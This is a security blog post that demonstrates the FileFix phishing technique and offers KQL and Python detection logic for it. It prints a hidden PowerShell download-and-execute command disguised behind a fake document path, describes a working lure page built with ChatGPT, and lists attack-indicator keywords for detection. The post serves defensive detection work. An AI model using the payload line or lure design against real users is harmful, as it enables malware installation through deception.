FileFix – Another Deceptive Attack Vector (Demo and Detections)
- Damien van der Linden
- Jul 11
- 3 min read
ClickFix was bad enough: it became the second most common attack vector, right after phishing. ClickFix tricked users with a deceptive webpage (often disguised as a CAPTCHA) that prompted them to copy and paste a string and open the Run dialog with WIN+R, and boom, hidden in front of what looked like a harmless path was a whole PowerShell payload. This led to a surge in infostealers, cryptominers, and RATs.
It was only a matter of time before similar techniques popped up. Inspired by a blog from Mr.Dox, a new variant has emerged: FileFix.
This prompted me to demo the technique and try writing some KQL detections for it. Honestly? It’s pretty simple to detect. But let’s take a look at what FileFix is, and check out a (totally vibe-coded) demo.
What is FileFix?
Like I said, FileFix is basically an evolution of ClickFix. While ClickFix focused on abusing the WIN+R Run dialog, FileFix uses File Explorer instead. The idea is the same: trick the user into pasting a malicious payload somewhere Windows will execute it, but this time it’s into the File Explorer’s address bar.
Whether the attacker asks the user to open File Explorer manually or uses a fake upload function on a phishing site, once that payload is pasted and executed, the command runs, often via PowerShell, MSHTA.exe, REGSVR32, or even BITSADMIN.
How Easy Is It to Set Up?
So... I wanted to see how easy it’d be to make a realistic-looking phishing site that uses FileFix. Some ChatGPT magic later, and within 30 minutes I had something fully working, and honestly? It looked pretty legit.
Here’s what the LindenSec Ultra Secure Document Sharing site looked like:

A bit of branding, a fake document name, some security blabla, and we’re good. It tells the user to copy a path to their clipboard and paste it into File Explorer for access. Totally normal behavior, right?
Even better, there’s a button to open File Explorer automatically using a simple file:// link embedded in the page.
Where the Magic Happens
Here’s where it gets spicy: the clipboard is silently overwritten with a malicious PowerShell command. It looks innocent at first glance:
C:\LindenSec\filedrive\CompliancePolicy.docx

But scroll left in the address bar... and surprise!
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { $script = (New-Object System.Net.WebClient).DownloadString('https://a-payload-url'); Invoke-Expression $script }" # C:\LindenSec\SecureAccess\Documents\ComplianceAudit_Q4_2024.docx

So while the user thinks they're just opening a file, PowerShell is launched silently and pulls in an external script. In my test case that was just a harmless dummy .ps1, so I could observe the behavior in Sentinel.

Hunting with KQL
Here’s the good news: this is super easy to detect.
PowerShell or mshta.exe being launched from a browser? That’s not normal behavior. Here’s a basic KQL query to hunt for FileFix-style abuse:
DeviceProcessEvents
| where Timestamp > ago(30d)
| where InitiatingProcessFileName in~ ("chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe")
| where FileName in~ ("powershell.exe", "pwsh.exe","regsvr32.exe","bitsadmin.exe","certutil.exe", "mshta.exe")
| project Timestamp,InitiatingProcessFileName,ProcessCommandLine, AccountName, DeviceName
| sort by Timestamp desc
This checks for suspicious binaries being launched from browser processes, behavior that should always be reviewed, whether it turns out to be legitimate or not.
Want to crank up the detection fidelity?
Add some classic FileFix/ClickFix keywords to catch malicious command lines:
| where ProcessCommandLine has_any ( "http", "https", "Invoke-", "mshta", "-eC", "Hidden", "iwr", "Invoke-WebRequest", "iex", "-Uri", "-outfile", " -e ", " -en ", " -enc ", ".msi", "Start-Process", "-replace", "Verification", "CAPTCHA", "robot", "curl" )
This will filter out most false positives while highlighting known indicators. If you’re using Microsoft XDR, suspicious PowerShell alerts should already help you zero in on this behavior quickly.
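As an added example (not code from the post), here is the same two-stage filter re-implemented in Python over constructed sample events, so the logic can be exercised offline before it goes into a workbook. Field names mirror the DeviceProcessEvents columns used in the query; the decoy-path check on a trailing "#" comment is my addition based on the payload shown earlier, and the events (including the shortened payload string reusing the post's placeholder URL) are made up.

```python
import re

# Parent/child names from the KQL query above; keywords from the second query,
# lower-cased because KQL has_any is case-insensitive.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "regsvr32.exe", "bitsadmin.exe",
           "certutil.exe", "mshta.exe"}
KEYWORDS = ("http", "invoke-", "mshta", "-ec", "hidden", "iwr", "iex", "-uri",
            "-outfile", " -e ", " -en ", " -enc ", ".msi", "start-process",
            "-replace", "verification", "captcha", "robot", "curl")
# Added check (my assumption, not in the post's KQL): a trailing '#' comment that
# holds a Windows file path is the decoy the address bar shows the victim.
DECOY_PATH = re.compile(r"#\s*[A-Za-z]:\\[^#]*\.\w{2,5}\s*$")

def stage1(event):
    """Browser process spawning a scripting or LOLBin child (first query)."""
    return (event["InitiatingProcessFileName"].lower() in BROWSERS
            and event["FileName"].lower() in LOLBINS)

def stage2(event):
    """Stage 1 narrowed by the ClickFix/FileFix keyword list (second query)."""
    cmd = event["ProcessCommandLine"].lower()
    return stage1(event) and any(k in cmd for k in KEYWORDS)

def hunt(events):
    """Return (DeviceName, child image, reasons) for each event that trips a rule."""
    hits = []
    for e in events:
        reasons = []
        if stage1(e):
            reasons.append("browser->lolbin")
        if stage2(e):
            reasons.append("keyword")
        if reasons and DECOY_PATH.search(e["ProcessCommandLine"]):
            reasons.append("decoy-path-comment")
        if reasons:
            hits.append((e["DeviceName"], e["FileName"].lower(), reasons))
    return hits

# Constructed sample events, not real telemetry; WS01 is a shortened demo payload.
SAMPLE_EVENTS = [
    {"DeviceName": "WS01", "InitiatingProcessFileName": "msedge.exe", "FileName": "powershell.exe",
     "ProcessCommandLine": 'powershell.exe -WindowStyle Hidden -Command "iex (iwr https://a-payload-url)"'
                           " # C:\\LindenSec\\filedrive\\CompliancePolicy.docx"},
    {"DeviceName": "WS02", "InitiatingProcessFileName": "explorer.exe", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"DeviceName": "WS03", "InitiatingProcessFileName": "chrome.exe", "FileName": "regsvr32.exe",
     "ProcessCommandLine": 'regsvr32.exe /s "C:\\Program Files\\Vendor\\plugin.dll"'},
]
```

Running hunt(SAMPLE_EVENTS) flags WS01 on all three reasons and WS03 only on the browser-to-LOLBin parent/child relation, which is exactly the triage split the two queries give you.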

I hope you guys enjoyed my short vibecode experiment with this new technique. Attached is the HTML code if you want to play around with it; just add a payload yourself and remember: EDUCATIONAL PURPOSES ONLY.
This shows that the ways to gain initial access are constantly evolving, and they don't have to be complicated.
Stay safe, and if you have feedback or spot any errors, please let me know.